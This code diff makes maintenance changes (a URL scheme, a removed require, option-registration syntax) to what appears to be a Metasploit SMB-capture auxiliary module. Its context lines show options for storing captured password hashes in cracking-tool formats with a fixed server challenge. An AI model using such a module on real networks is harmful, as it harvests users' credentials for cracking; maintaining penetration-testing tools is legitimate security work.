@@ -1,14 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-require 'msf/core'
-
-
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::SMB::Server
 
@@ -43,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('CAINPWFILE',  [ false, "The local filename to store the hashes in Cain&Abel format", nil ]),
         OptString.new('JOHNPWFILE',  [ false, "The prefix to the local filename to store the hashes in John format", nil ]),
         OptString.new('CHALLENGE',   [ true, "The 8 byte server challenge", "1122334455667788" ])
-      ], self.class )
+      ])
 
     register_advanced_options(
       [
@@ -73,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
             "The domain name used during smb exchange with SMB_EXTENDED_SECURITY set.",
             "anonymous"
           ])
-      ], self.class)
+      ])
 
   end
 
@@ -652,5 +647,4 @@ class MetasploitModule < Msf::Auxiliary
     end
 
   end
-
 end
